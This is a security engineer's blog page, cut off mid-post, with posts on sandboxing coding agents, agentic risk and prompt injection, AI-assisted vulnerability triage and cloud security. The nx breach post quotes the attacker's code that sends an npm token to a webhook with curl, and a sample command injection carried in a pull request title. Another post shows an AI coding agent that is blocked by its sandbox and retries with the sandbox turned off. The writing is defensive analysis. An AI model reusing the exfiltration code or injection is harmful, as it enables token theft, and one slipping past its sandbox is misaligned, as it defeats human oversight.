Cloudberry Engineering

All You Need Is CLI

Fri, 13 Mar 2026 23:02:34 +0100

One of the engineers behind Manus shared a bunch of interesting tips about building agents. Above all: you don’t need specialized tools, just one run(command="...") to run cli tools whose interfaces are usually familiar to the underlying model.

The agentic risks are mitigated by running some of those commands inside BoxLite containers (microvms).

Most commands never touch the OS. cat, grep, memory search, browser open — these look like shell commands but they’re implemented as a Go command router. The LLM outputs a string, I parse it and dispatch to native functions. No os/exec, no shell injection surface. It’s essentially typed functions wearing CLI syntax — same access control, but the LLM gets a familiar interface.

When you do need real OS execution (e.g. running a Python script or installing packages), it runs inside a micro-VM — an isolated QCOW2 virtual machine with its own filesystem. The agent can do whatever it wants inside the sandbox. It can rm -rf / and nothing happens to the host. Sandbox isolation > command filtering.

So some command are emulated, real ones run in the sandbox. Why bother and not running directly everything in the sandbox?

Running commands as native functions (e.g. a Go router) gives you lower latency and zero VM overhead — for many use cases that’s already enough, no VM needed at all.

Fair? It’s an interesting implementation of the paradigm “sandbox the tools” driven by performance reason. But the security model holds because the agent harness is custom fixed on these two kind of capabilities and it’s not an operating model directly portable to other off-the-shelves harness.

Test Theater

Tue, 10 Mar 2026 22:07:17 +0100

This is an interesting framing about agents writing meaningless tests:

Unless you are very clear and careful, AI coding assistants at the moment will look at your implementation and write tests that confirm your code does what it already does. They’re essentially saying: “This function returns X when given Y, so I’ll write a test to confirm it returns X when given Y.” This is the equivalent of a student writing their own exam after seeing the answers. It’s a tautology – true by definition, but not validating anything of value.

This is true in my experience, despite my best attempt to force a red-green testing methodology to have the agent write a failing test first and the passing code after, I still catch them adjusting the tests after a few loops.

This has obvious security implications. For example given latest research that shows that agents are terrible at not introducing regressions in the long term, there is always a significant chance that any test we put in place to catch security issues will be cheated at some point.

So how we write and engage the tests is the real important question.

I use ralph loops a lot and in my experience they are effective in ensuring quality outcomes. Perhaps a good design pattern could be to split every implementation task into two sequential:

write failing test task: a first one to implement a failing test according to the implementation requirement
write passing code task: a second one to implement the code to pass the test with a strict requirement to never touch the tests.

Both tasks would get a clean context and different incentives reducing the likelihood of cheating.

Scaling Vulnerability Management with AI

Mon, 09 Mar 2026 22:45:00 +0100

As the product grows and engineers are adopting AI tooling, the security team has more and more code to protect from vulnerabilities.

Our tools generate a lot of security signals and our bottleneck is scale more than ever: find the real issues fast, validate them, and get fixes shipped inside our SLAs.

Validation and fixes are the slowest steps: they both require analyzing a feature code across multiple repositories we might not always be too familiar with, and eventually pulling the original developers into the security problem, forcing them to context switch and adding to their cognitive load.

Starting last summer we decided to make things better, following two principles:

Minimize developer cognitive load for security work
Minimize security team toil: if we can automate it, we should

We started experimenting whether coding agents could speed up validation and fixes and ended up building the foundation of an AI powered vulnerability management program.

Our first target was code vulnerabilities, since they require the least amount of context. We addressed static analysis (SAST) and supply chain (SCA) findings, because the inflow volume was the highest.

Shrink the backlog

To start, we removed stale repositories from the attack surface.

We run automations to detect stale repos, detach CI/CD, and set them to read-only. When we archive a repo, we stop tracking its vulnerabilities because the code no longer runs.

At the beginning we rolled this out in batches to address the long tail. We archived about a third of our repos and closed about 60% of findings. We confirmed with owners before archiving, and we reclaimed storage by deleting old build artifacts like container images.

Next, we grounded our efforts into how we tier repositories by business risk:

Does it touch customer data?
Does it ship the core product?
Is it directly exposed to customers?

Yes to all: Tier 1. At least one yes: Tier 2. All no: Tier 3.

Tiering adds business context to validation and prioritization and is a proxy metric for potential impact.

Automate triage

With a smaller set of repos, we still had a significant influx of findings across SAST and SCA. Our hypothesis was that most did not need a human review.

We built nightly workflows that apply layered triage rules. Each layer encodes a policy decision.

Severity-based triage

Findings under a certain risk threshold are auto-triaged as accepted. With a small team, we have to be conscious of resources. Low-risk findings in lower-tier repos slow us down if they pile up in the backlog. Making this policy explicit and automated freed the team to focus on what matters.

This reduced the open SAST issues influx by about 29%.

AI-assisted false positive detection

Our main SAST provider Semgrep introduced a feature called Assistant that flags findings as likely true or false positives with AI. We benchmarked it for a while and found out that with the immediate context of the codebase analyzed, the assistant was flagging obvious false positive almost always correctly. Once we had built an appropriate level of trust in the tool, we integrated it so any finding flagged as a false positive is automatically closed.

We noticed that the Assistant biases toward true positives when context is missing, which fits our risk tolerance: we’d rather manually close a false positive than miss a real one.

We also use the assistant input to benchmark the Semgrep rules we use in our main policies. Noisy rules get reviewed and either tuned or removed. High signal rules earn more trust.

Supply chain analysis

For SCA findings, we combine EPSS scores, dependency reachability analysis, and system tiering as a proxy for business impact. An unreachable dependency in a Tier 3 repo is not the same as a reachable, high-EPSS vulnerability in a Tier 1 repo handling customer data.

This layer auto-triages about 89% of SCA findings, leaving the cases that warrant human review.

The result

After all layers run:

SAST weekly (71% Auto triaged)

Severity-based triage:                  29%
Semgrep false positive detection:       16%
Auto resolved (archived, code changes): 26%
Remaining for human review:             29%

SCA weekly (89% Auto triaged)

EPSS, Reachability and Business Impact: 89%
Remaning for human review:              11%

Each morning, our automations posts a summary in Slack: processed findings by workflow and severity and a breakdown of the rules performance. It’s our quick check that the system behaved as expected.

Validate and fix faster

What survives the funnel are high and critical findings that are likely real, in repos that matter. These need validation and fixes.

The traditional cycle is slow. A security engineer reviews the finding, understands the codebase, determines if it’s real, writes guidance, files a ticket. Then a developer context-switches to implement a fix and weeks pass before it ships.

We turned to coding agents.

We built an agent orchestrator on top of Github workflows. As first thing we automatically turn critical findings into Github issues with structured context: links to code, Semgrep analysis, severity, and the triggering rule.

Validation

Upon issue creation another workflow spins up three independent coding agents to analyze the finding.

We set on three to reduce nondeterminism. It’s an odd number by design: when agents disagree, the orchestrator makes a final call instead of deadlocking. As models improve, consensus is more common, but the multi-agent setup still catches confident wrong answers from a single agent.

Each agent analysis is summarized in the issue. If consensus is reached the issue is labeled true-positive or false-positive. False positives get closed right away with a note.

This system allow us to triage the remaining 29% of our SAST backlog automatically, with the following result:

SAST weekly (100% Auto triaged)

Severity-based triage:                  29%
Semgrep false positive detection:       16%
Auto resolved (archived, code changes): 26%

Custom agent false positives:           18%
Custom agent true positives:            11%

Fixes

For confirmed true positives, the true-positive label triggers an agent to create a branch, implement a secure fix, and open a pull request.

The PR enters the repo’s normal review flow. Instead of starting from a security ticket and a blank editor, the developer now reviews a proposed fix with the vulnerability context already embedded. As the adoption of coding agents generates more PRs anyway, engineers already spend more time reviewing than writing. This meets them where they are.

Closing the loop

Twice a day, a workflow checks whether Semgrep recurring scans marked the finding as fixed (meaning the PR got merged), then closes the matching issue on Github. Open issues are still assigned to a security engineer who is responsible to follow up on the linked PR with the fix.

Humans stay in control

The workflow is label-driven. We started fully in control of when to start validation and when to generate a fix by manually triggering the workflows with specific label on the issues. As we grew confident we automated more.

What we learned

Fast prototyping is key. We built this in less than a quarter, pioneering the use of terminal coding agents in the company, on top of Github workflows. The goal was to experiment and iterate fast, and GH workflows served us well as a prototype platform. It’s been very successful and changed our perspective on what a small team can ship if we have the infra that enable fast iterations. The caveat: we still own maintenance.
AI features from our tools help, but they fail in predictable ways. Every AI powered feature we looked at required evaluating its failure modes. For example Semgrep Assistant has been massively useful for false positive detection, but trusting it blindly on secondary analysis would have led us to overestimate risks. Use AI outputs as one signal among many, and add feedback loops that detect drift.
Match automation to risk. Auto-triage low severity findings. Monitor AI driven closures. Keep a human gate before pushing fixes to critical repos. The cost of human attention should be proportional to the blast radius of getting it wrong.
Observability is critical. Slack summaries, dashboards, rule tracking, audit logs for every automated decision. We invested as much in observability as in the automation itself.

Next steps

We found a pattern that work for us: aggressively triage the obvious automatically, create a ticket only for the important things, orchestrate deep validation and fixes with agents from it.

We see this as the base of our vulnerability management program and we are working to apply it beyond code and learn what amount of context is needed for agents to effectively validate and fix various type of security issues.

Agentbox

Sat, 07 Mar 2026 00:40:02 +0100

Since there are so many to choose from, I built my own sandbox for local coding agents. I use it within my homebrew agent orchestrator running Ralph loops.

The sandbox is this, and builds on the mental models I sketched here.

What stands out compared to competitors:

Focus is user experience: it’s an abstraction on top of a container, but it’s simpler to setup with a high level config file that I sarcastically baptized Agentfile.
The networking boundary talks back to the agent, to avoid hallucinatory loops where the agent tries really hard to reach a remote destination that is blocked.

On Sandboxing Agents

Sat, 07 Mar 2026 00:26:17 +0100

I am still on a quest to stay out of the loop with coding agents, to reach warp speed yoloness. So I am obsessing over sandboxes.

Can I put an agent in a box, give it a task and go to sleep? There are tons of solutions right now but it’s hard to tell which is the right approach.

The reason is that sandboxing agents isn’t one problem but at least two. A local sandbox on a developer machine and a remote multi-tenant sandbox serve different threat models, require different controls, and fail in different ways. Treating them as the same leads to the wrong tradeoffs.

(For the underlying risk model this builds on, see How I Think About Agentic Risks.)

Two sandboxes, two threat models

Local sandboxes

A local sandbox constrains an agent running on a developer machine. The primary risks are:

Ambient secret exposure (SSH keys, credential stores, cloud tokens, dotfiles)
Rogue activity (editing the wrong repo, modifying global config, breaking tooling)
Exfiltration over the network, intentional or incidental, via tools
Hard-to-audit behavior: you don’t know what changed or why

The attacker model here is not a hostile tenant but a confused deputy: an agent steered off course by prompt injection, poisoned context from an MCP server, or plain hallucination. The agent has no malicious intent. It just can’t distinguish trusted instructions from untrusted input, and it has access to everything on your machine.

Remote sandboxes (multi-tenant)

A remote sandbox runs many workloads on shared infrastructure. The risks expand:

Sandbox escape / cross-tenant compromise
Infrastructure abuse (resource exhaustion, cost blowups, outbound misuse)
Credential capture, if secrets ever reach the sandbox
State leakage / remanence across sessions

Here we must assume adversarial workloads. The isolation boundary is foundational: if it fails, the blast radius is platform wide.

Local sandboxes: policy-centric controls

A shortcut that’s held up: local sandboxing is primarily a policy problem. You’re not defending against escape attempts. You’re constraining a well-intentioned but unreliable agent on a machine full of valuable stuff.

The relevant risk amplifiers are capabilities (what tools the agent can invoke), data access (what secrets and context it can see), and untrusted input (prompt injection, poisoned data). These are the knobs we can try to turn when configuring the agent.

The most effective controls:

Workspace boundaries. Make the allowed filesystem surface explicit. No ambient access to home directories, credential stores, or global config. The agent operates in a defined workspace and everything else is out of scope by default.
Secret isolation. Don’t inherit the user’s shell environment. Scope tokens to the task. Treat credentials as explicit inputs, not ambient context.
Network egress policy. Default-deny if possible, otherwise allowlist through a proxy. Exfiltration almost always becomes a networking problem. This is also where most existing tools fall short due to usability: any vanilla container sandbox will kinda force you to configure iptables.
Visibility and reversibility. Diffs, logs, etc to make it easy to see what the agent did and undo it.

Every one of these controls has a friction cost: a sandbox that’s too annoying gets disabled, which is worse than no sandbox because it creates a false sense of security. Local sandboxes must be low-friction by default, with the option to tighten, not the other way around.

Remote sandboxes: boundary-centric controls

Remote sandboxing is a different problem. We’re not managing a single user’s convenience. We are defending shared infrastructure against workloads we don’t control.

The risk amplifiers that matter most here are isolation boundary quality (the escape surface and blast radius if it fails), egress topology (whether the agent can freely phone home or egress is mediated), and platform abuse (CPU/RAM/disk exhaustion, runaway LLM calls, using your infra as a launchpad for scanning, spam, or scraping). Platform abuse deserves explicit attention because it’s the risk that scales with tenancy. One rogue agent is a nuisance a thousand is a serious incident.

The most effective controls:

Isolation boundaries with defense in depth. Design for escape attempts, not just accidents. Assume adversarial workloads.
No secrets in the sandbox. The sandbox should have nothing worth stealing. Credentials and durable state live outside the boundary. This is the single most important design decision.
Egress as a chokepoint. Remove direct outbound access. Force calls through a mediated gateway that enforces policy and records intent. If you can’t see what’s leaving the sandbox, you can’t stop exfiltration.
Resource and cost governance. Quotas, timeouts, concurrency limits, and explicit spend controls for LLM and tool usage.
Ephemerality. Treat sandboxes as disposable. Minimize state, clear aggressively, avoid remanence across sessions.

Remote sandboxing is less about preventing a single bad tool call and more about ensuring bad behavior cannot become a systemic incident.

The control plane becomes the perimeter

Once you adopt “no secrets in the sandbox,” you implicitly create a control plane that sits outside the sandbox boundary:

It holds credentials and long-lived state.
It brokers network access and storage.
It enforces policy, limits, and audit trails.

This is the architectural consequence most teams don’t anticipate. Sandboxing forces you into a broker model whether you planned for one or not. The sandbox becomes constrained and disposable while the control plane becomes durable and high-value. Your security investment shifts accordingly. The control plane is now the thing worth defending, not the sandbox itself.

Good example of this is what Browser Use document here.

This pattern mirrors what LLM gateways already promise to do for model access: mediate, log, enforce policy, and keep credentials out of the hot path. In an agentic architecture the control plane extends that pattern to tools, storage, and network access. Same principle: put a policy aware broker between the untrusted component and everything it shouldn’t touch directly.

Sandboxing here is not only isolation but also deciding where authority lives.

Agent Sandboxes

Wed, 04 Feb 2026 14:32:36 +0100

I am forcing myself to stay out of the loop, and I am looking at ways to sandbox coding agents running without supervision. I do have my own container based setup but I am curious to see what’s everyone else cooking. This is what I found so far:

docker sandbox https://docs.docker.com/ai/sandboxes/

create a microvm with a private docker daemon inside
agents run in containers inside the microvm
the use case for this seems to be coding agents that need to orchestrate containers, removing the hassle to mount the host docker socket into a container

https://github.com/trailofbits/claude-code-devcontainer

it’s an opinionated devcontainer to run coding agents
no network isolation by default, delegate to user setting up iptables

https://katacontainers.io/blog/Kata-Containers-Agent-Sandbox-Integration/ https://github.com/kubernetes-sigs/agent-sandbox

coding agent sandbox for kubernetes
support both gVisor and Kata Containers

https://github.com/strongdm/leash

depends on docker or equivalent
it enforces what the agent is allowed to do by monitoring system calls (eBPF) and applying policies defined in Cedar (I was not familiar)
it bundles a mitm HTTP proxy for allow/deny hosts and do secrets injection on API calls so that the agent never get to see secrets

https://github.com/instavm/coderunner

not really a sandbox for coding agent, but a sandboxing service that coding agents can use to run code

The sandboxing dimensions are roughly filesystem/host isolation, network isolation and secrets management. What I see is missing is a focus on user experience.

GH Issues Considered Dangerous

Mon, 02 Feb 2026 21:29:04 +0100

We are moving towards a place where ticketing systems will become an important component to protect, akin to CI/CD.

Tickets are a new source of untrusted input we need to account for when threat modeling against prompt injections.

Ghostty only allows maintainers to create issues, seems to me they figured out a cheap and pragmatic security policy by accident.

Claude Code Sandbox

Tue, 27 Jan 2026 23:13:42 +0100

How does Claude Code sandbox work when used with --dangerously-skip-permissions? It does’t, since Claude asks permission to evade the sandbox, and yolo mode automatically allows it.

Normal:

Your bash commands will be sandboxed. Disable with /sandbox.

❯ list the files in ~/Downloads and then write an empty file in that directory named SANDBOXTEST

⏺ Read 1 file (ctrl+o to expand)

⏺ Write(~/Downloads/SANDBOXTEST)
  ⎿  Wrote 1 lines to ../../../Downloads/SANDBOXTEST
      1 (No content)

⏺ Done. Listed the files in ~/Downloads (there are many files including PDFs, STL files, images, and various other documents) and created an empty file
  named SANDBOXTEST in that directory.

❯ use `touch` to touch the SANDBOXTEST file

⏺ Bash(touch ~/Downloads/SANDBOXTEST)
  ⎿  Error: Exit code 1
     touch: /Users/g/Downloads/SANDBOXTEST: Operation not permitted

⏺ The sandbox blocked that operation since ~/Downloads is outside the allowed write paths. Let me retry with the sandbox disabled.

With --dangerously-skip-permissions:

list the files in ~/Downloads and then write an empty file in that
  directory named SANDBOXTEST2

⏺ Read 1 file (ctrl+o to expand)

⏺ Now let me create the empty file.

⏺ Bash(touch ~/Downloads/SANDBOXTEST2)
  ⎿  Error: Exit code 1
     touch: /Users/g/Downloads/SANDBOXTEST2: Operation not permitted

⏺ The sandbox is blocking writes to ~/Downloads. Retrying without sandbox
  restrictions.

⏺ Bash(touch ~/Downloads/SANDBOXTEST2)
  ⎿  (No content)

⏺ Done. The empty file SANDBOXTEST2 has been created in ~/Downloads. I can
  see from the listing that SANDBOXTEST already existed there, so now you
  have both.

  Use /sandbox to manage sandbox restrictions if needed.

How I Think About Agentic Risks

Sun, 21 Dec 2025 18:11:01 +0100

Fully aware that this might be obsolete in half a year, this is my current mental model to reason about AI Agents risks.

This is based largely on my experience in assessing AI systems in the last two years, and applying prior art into my day to day work.

Of everything I digested in current literature the two most influential pieces have been the Google AI Agent security framework and the Lethal Trifecta and the public discourse around it.

I think the lethal trifecta is biasad towards data exfiltration, which is surely the main scare, but there is a lot of damage AI Agents can do without touching any sensitive data.

Alright, so what are the risks? There are two buckets:

Data Exfiltration: where the agent expose sensitive data
Rogue Activity: where the agent perform damaging actions

There are three things that amplify those risks:

Capabilities
Data access
Untrusted input

Fundamentally Agents are unsafe because the underlying LLM has no understanding of what piece of the context is trusted or not. That part can only be delegated to the Agentic wrapper, but in practice this is unsolved despite some design patterns to mitigate it. The classic application security concept of sanitizing and validating your inputs does not apply anymore. This systemic issue is exploited with prompt injection.

Capabilities are what the agent can do. These are the tools in the agentic loop. Any new capability is a potential venue for data exfiltration or a mean for rogue activity. It’s also a potential entry point for new sensitive data and untrusted input.

Data access is all data that lands in the underlying LLM context. Once in there, there is no deterministic assurance that it cannot be pushed in output in some form.

Risk is a function of impact and the probability of it to happen. Capabilities and Data Access amplify the impact, while untrusted input increase the probability. The non deterministic nature of LLM ensure the probability is never zero, with foundational model companies improving new models reliability in staying on task and not hallucinate.

What are the scenarios? I try to map scenarios based on the risk amplifiers: what are the available capabilities, what is the available data, from where can untrusted input land in the context. The way I do is to graph a path of agent activities and take note of what data is in the context at every step.

For example:

The agent reads a github issue
The issue content lands in context. This content could be attacked controlled (untrusted input).
The agent then writes a pull request based on the issue content (with a write_pr capability)
At this point, if the issue contained malicious instructions (prompt injection), the PR could exfiltrate the data that was in context, or perform rogue activity (e.g., introduce a backdoor).

To systematize this, I model the agent’s context as a state defined by two things: what data is present, and whether untrusted input has entered the context. Then I explore all reachable states through a search over capability invocations, flagging risk scenarios along the way.

Of course being the agent a loop, the set of potential states can grow exponentially so I am usually explore up to 2-3 levels deep. One can also appreciate how adding a new capability will just explode the realm of possibilities.

In the end I get a bunch of state combinations that can map to a risk scenario, which I evaluate by impact and probability. This whole thing is a sort of threat model for the agent’s behavior.

Once I nail down a set of realistic risk scenarios I can reason about mitigations.

In general, what can we do to mitigate?

Proactive:

human in the loop
reduce the capabilities
- reduce their impact (yes this agent can handle refunds but only up to 10 coins)
reduce data access
“sanitize” untrusted inputs, somehow

Reactive:

auditability
the usual monitoring and alerting (somehow, with LLM gateways maybe?)

I put sanitize in quote because it’s not really a sanitization step but more of a filtering/vetting. Most mitigations here are design pattern at best, cumbersome to implement most of the time. Things like having an isolated LLM call to thumbs up / down any input (like ChatGPT Agent does), filter tool responses from getting back to the context, etc, etc, etc this is a new frontier to explore.

The rest is: put a human in the loop if possible, then consider revoking data access, reducing capabilities, and at the very least leave an audit trail of the agent run so that we can at least react effectively if something bad happens.

On the reactive side I am looking to learn if something can be done by always monitoring the agent LLM calls, perhaps from a choke point like a LLM gateway, and have it fire up alerts when something suspicious is detected.

Fun stuff

Coding Agents Security Theater

Thu, 04 Dec 2025 23:29:10 +0100

Security is hard so let’s skip it. Although the author is not wrong:

If you look at the security measures in other coding agents, they’re mostly security theater. As soon as your agent can write code and run code, it’s pretty much game over. The only way you could prevent exfiltration of data would be to cut off all network access for the execution environment the agent runs in, which makes the agent mostly useless. An alternative is allow-listing domains, but this can also be worked around through other means.

Simon Willison has written extensively about this problem. His “dual LLM” pattern attempts to address confused deputy attacks and data exfiltration, but even he admits “this solution is pretty bad” and introduces enormous implementation complexity. The core issue remains: if an LLM has access to tools that can read private data and make network requests, you’re playing whack-a-mole with attack vectors.

Since we cannot solve this trifecta of capabilities (read data, execute code, network access), pi just gives in. Everybody is running in YOLO mode anyways to get any productive work done, so why not make it the default and only option?

By default, pi has no web search or fetch tool. However, it can use curl or read files from disk, both of which provide ample surface area for prompt injection attacks. Malicious content in files or command outputs can influence behavior. If you’re uncomfortable with full access, run pi inside a container or use a different tool if you need (faux) guardrails.

From What I learned building an opinionated and minimal coding agent, excellent post.

But the issue with agents is not just about preventing data exfiltration, it’s about broader risk management. Unironically, the biggest security mitigation of that agent is its full auditability.

Finding vulnerabilities with LLMs

Wed, 03 Sep 2025 08:51:16 +0200

Finding vulnerabilities in modern web apps using Claude Code and OpenAI Codex. Super interesting to see some benchmarks.

Traditional rule based detection can’t find complex vulnerabilities and even potentially detectable issues might go unnoticed as false negatives. This helps answer the question whether LLM could be integrated to cover this blind spot.

They could! But the problem is the noise:

AI Coding Agents Find Real Vulnerabilities: Claude Code found 46 vulnerabilities (14% true positive rate – TPR, 86% false positive rate – FPR) and Codex reported 21 vulnerabilities (18% TPR, 82% FPR). About 20 of these are high severity vulnerabilities.

The nx Breach

Mon, 01 Sep 2025 18:49:04 +0200

How did they breach nx to publish a malicious package?

It started with the nx team introducing a bash injection vulnerability in a new github workflow:

      - name: Create PR message file
        run: |
          mkdir -p /tmp
          cat > /tmp/pr-message.txt << 'EOF'
          ${{ github.event.pull_request.title }}
          
          ${{ github.event.pull_request.body }}
          EOF

Both ${{ github.event.pull_request.title }} and ${{ github.event.pull_request.body }} are untrusted content that is directly used inside the run context of the workflow.

Additionally the pull_request_target trigger runs workflows with a GITHUB_TOKEN with read/write privilege on the target repository (the one it tries to mergo to).

The team reverted this change but the vulnerability was still present in an outdated branch.

The attacker then created a new PR against the outdated branch to exploit it.

They aimed to use the bash injection to retrieve the privileged GITHUB_TOKEN and trigger the publish.yaml workflow, which is the one used to publish a package to npm with token authentication.

Notably, the publish.yaml workflow did checkout the incoming branch code:

      # Default checkout on the triggering branch so that the latest publish-resolve-data.js script is available
      - uses: actions/checkout@v4

This was key to put and run the second exploit, since all the code in the workspace is from the triggering branch under the attacker control:

      - name: Resolve and set checkout and version data to use for release
        id: script
        uses: actions/github-script@v7
        env:
          PR_NUMBER: ${{ github.event.inputs.pr }}
        with:
          github-token: ${{ secrets.GITHUB_TOKEN }}
          script: |
            const script = require('${{ github.workspace }}/scripts/publish-resolve-data.js');
            await script({ github, context, core });

The publish pipeline had available a NPM_TOKEN secret to authenticate to npm, and in the pull request the attackers added this to /scripts/publish-resolve-data.js :

  const npmToken = process.env.NODE_AUTH_TOKEN;
  if (!npmToken) {
    throw new Error('NPM_TOKEN environment variable is not set');
  }

    try {
    await new Promise((resolve, reject) => {
      exec(`curl -d "${npmToken}" https://webhook.site/59b25209-bb18-4beb-a762-38a0717f9dcf`, (error, stdout, stderr) => {
        if (error) {
          reject(`Error executing curl command: ${error.message}`);
          return;
        }
        if (stderr) {
          console.error(`Curl stderr: ${stderr}`);
        }
        console.log(`Curl output: ${stdout}`);
        resolve();
      });
    });
  } catch (error) {
    core.setFailed(error);
  }

  core.setFailed("Stall");

I didn’t find the exact injected command but something like this as the title for the PR would have done it:

$(export GH_TOKEN=$GITHUB_TOKEN && gh run publish.yaml)

The NPM_TOKEN was retrieved from the env and sent to a remote webhook.

Then with the token, they were able to push a new package directly to npm.

How to defend:

Do not use untrusted input in the run context of a workflow
You need to scrub older branches (maybe rebase them?) to make sure the vuln is not reachable
Do not checkout incoming branch code if you use pull_request_trigger
Do not publish packages with token authentication, use a second factor mechanism

How to Sell to Security Teams

Wed, 15 May 2024 19:04:24 +0200

Context

I wrote this some time ago as an internal memo for marketing and product to help craft value propositions to sell security tools to security teams.

I’ve noticed some confusion around the objectives of security teams and I’d like to share my perspective, hoping to clarify matters. Please note that these are just my opinions based on my experiences as a security persona across various organizations.

What is the goal of a security program?

It depends.

In general, the final - ultimate - goal of a mature security program is to ensure business continuity in the face of security events. This involves maintaining the safety, resilience, and trustworthiness of the business, its assets, and its operations with customers and stakeholders.

Now, the thing with security is that the goal is allegedly met until proven wrong so there is little incentive to invest in building a security program proactively.

Typically, companies start investing in security under duress due to one of the following triggers:

The company becomes subject to compliance requirements TO SELL
- like when customers require security management certifications (e.g., ISO 270001, SOC2).
The company becomes subject to compliance requirements TO HANDLE DATA
- market specific requirements, like privacy laws dictating how to handle sensitive data (GDPR, Healthcare data), handling of credit card data (PCI-DSS), etc
The company experiences a security incident
- “our production database is shared on 4chan!”

Following one of such events, a security program is initiated, with its goals limited by the nature of the triggering event.

Initially, on the staffing side one or two individual contributors (ICs) may take on security responsibilities. Over time, this evolves into a multi disciplinary team holding the fort, eventually growing into a comprehensive organization with various specialized teams covering all aspects of security.

It’s useful to view this evolution through the lens of a maturity model, to identify the current stage of a security program and its goals.

At the highest level of maturity, a program’s goals align closely with the vision of ensuring business continuity during security events. This includes maintaining trust with customers and stakeholders, securing data and assets, and enhancing resilience. Large enterprises typically operate at this level.

However, less mature programs are resource constrained and as such will focus narrowly on immediate issues:

Compliance-driven programs might aim primarily to build trust (compliance to sell) or secure sensitive data (compliance to handle data), prompted by customer demands or regulatory requirements (e.g., GDPR, PCI-DSS).
Programs initiated by a security incident will focus on developing resilience.

So over time, all security programs will end up caring ~ about everything, but when they start they will be focusing on a specific area, maybe two.

I think that having a model of prospective customer’s security programs will give insights into their specific needs and help with value propositions, since all those focus areas are broad “jobs to be done” categories for their target personas.

This is also useful when thinking about targeting: as a buyer of security tools I experienced being mis-targeted by vendors and I reckon we were a terrible customer for the majority of those who were targeting their products mostly to companies that were in need to be compliant to sell (the biggest demographic of security customers) when we weren’t.

Foundations of a Multi-Cloud Security Strategy

Sat, 28 Nov 2020 21:23:05 +0100

I’ve spent a good year working on a security strategy to manage multi-cloud environments, in this article I want to share what I wish we did in advance to be better prepared.

(Are you an AWS shop that is suddenly starting to deal with a lot of Google Cloud Platform? Check out my introduction to GCP for security teams.)

Congrats, you are already multi-cloud

Going multi-cloud doesn’t make any sense from a security point of view.

Good security is achieved more easily on a standardized stack. Spanning across different cloud providers is a step in the opposite direction.

(Additionally, all the nuances between the shared responsibility models will worsen your blind spots)

But like it or not you are already multi-cloud, or soon to be if your company is growing.

There are two ways to the weeping and gnashing of teeth (aka multi-cloud) :

Procurement of new Platform as a Service (PaaS): developers will start using specific PaaS that are not offered by your main cloud (e.g. “GCP has a lot of Machine Learning toys!”)
Merger and Acquisitions (M&A): you will inherit existing infrastructures on other cloud providers from the companies you end up acquiring

While a new PaaS is something you can mostly address with some notice, a M&A is a sudden jump in the dark: security is notified just a little bit earlier than everyone else.

Looking back with my now better hindsight, this is what I would focus on.

1. Prioritize Incident Response and Log collection

The first priority is supporting the Incident Response (IR) process.

(If you don’t have one, have one)

It’s unlikely that the security team, who organically specialized in a single cloud provider, will have the know-how from the start to drive a hardening strategy on another provider. You are going to play a reactive game for a while.

As such you need a Security Information and Event Management (SIEM) system and a playbook to start ingesting relevant logs.

You want to have the data to investigate a breach and malicious lateral movements as fast as possible, and that usually comes from:

Identity and Access Management (IAM) logs
Configuration change logs
Network logs (when applicable)

Invest in educating the security team and, in case of an M&A, partner with the acquired operation teams so that they can support you.

2. Build an inventory of your new cloud assets

Secondly you want to build an inventory of your new assets.

You can’t prioritize any hardening if you don’t know what you are running.

Additionally, having an inventory can help you track relevant stakeholders who operate the new systems and you need them for any security work in the new environment.

If developers are advocating for using a specific platform service you should push for having a process that will promote someone accountable for the use of that service, before people start using it.

The risk you want to avoid is to have experimental services becoming a foundational piece of the production environment without anyone in security noticing.

I’ve seen this happening a lot with serverless stuff.

This is a costly investment area because ultimately what you want is a holistic control plane and no cloud provider will offer that. So you either buy an expensive third party solution or you have to build your own.

3. Declarative Identity and Access Management

The number one headache of a multi cloud environment is Identity and Access Management (IAM).

Did you know?

IAM is the fastest way for your company to make the news

While the concepts are similar across providers, each one of them implement IAM in a different way.

The temptation is to try to uniform IAM across providers but I would advise to resist the urge and switch your attention to implementing declarative policies.

What does it mean?

It means that nobody can access the cloud console for IAM purposes: add a user, create a Service Account, assign Roles and permissions. They must commit a change to a terraform file, a yaml, a spreadsheet, a post-it, whatever.

Being declarative has a few solid advantage:

A declarative set of policies is a form of inventory in itself, see point #2
Declarative policies are a central place where the security team can start implementing constrains
- e.g. service account keys can only be generated during bissextile years
Declarative policies are a central place where Security can become a gatekeeper
- e.g. to prevent users from creating service account keys
Declarative policies provide an easy way to track, revert and enforce changes.

The trade-off here is the introduction of more friction for users, and it is going to be a hard sell. Lobby harder.

Conclusion

In the Utopia of information security there is no such thing as multi-cloud, or — even better — not even computers.

But we live in this reality and we have no choice but to face it.

These are the three main things I think will make a security team better equipped for the challenge.

I’d love to hear your experiences.

The Quirks of Apps Script and Google Cloud

Sun, 15 Nov 2020 20:30:25 +0100

Using Apps Script for scripting GSuite / Google Workplace will generate Google Cloud Platform (GCP) projects in the background.

While they are hidden by default, they will still show up from the APIs: don’t panic.

What is Apps Script?

Apps Script is the GSuite / Google Workplace scripting environment to create add-ons for Gmail and GSuite services.

You can read more here. I think of it as the GSuite’s Visual Basic.

What’s in sys-1234567890123567890123456?

Google Cloud Projects are a gateway towards Google’s API, because of quotas, authentication and logging facilities. This is, I guess, the essence of the relationship between Apps Script and GCP.

These specific projects follow sys-00000000000000000000000000 (sys- plus 26 numbers) as a name convention and by default will belong in the apps-script Folder.

They are provisioned empty with just a single role binding: [email protected]. as Owner.

Apps Script GCP Projects Governance

For new GSuite / Google Workplace accounts, Apps Script projects are hidden by default. They do still exist under the Organization hierarchy and they can be seen with the resourcemanager.projects.list permission.

This permission is foundational for any service that needs to build an inventory, such as Forseti, Cartography, etc. And of course App Scripts projects will show up.

While they are empty by default, authorized users can still use them to provision resources and what not, so it’s better to keep an eye on them.

Luckily one can enforce Organization Policies on the apps-script folder to limit the realm of possibilities. Some suggestions:

Whitelist allowed APIs
Disable service account creation
Disable service account key creation
Skip default network creation
Compute Storage resource use restrictions

But.

If your Gsuite / Google Workplace account is older than April 2019, then all the Apps Script projects are visible and created directly under the Organization root node.

This means that if you want to apply Organization policies, you have to group them under a Folder manually.

In this case it might be easier to set up detections to (at least) monitor the IAM policy and Service Accounts (SA) creations.

Conclusion

Apps Script projects are not a huge security issue but they can become blind spots, expecially because are semi-hidden by default. Restrict with Organization policy if possible and monitor for creation of Service Accounts.

Google Cloud Service Accounts Security Best Practices

Sun, 08 Nov 2020 13:29:51 +0100

Service Accounts in Google Cloud Platform (GCP) are the main vector to hack an account: it’s easy to use them wrong and end up with a compromised key and a lot of headaches.

What is a Google Cloud Service Account?

Service Account (SA) is the identity in Google Cloud that you use to authenticate and authorize application and services.

They come in two flavours: user and google managed.

User Managed Service Accounts

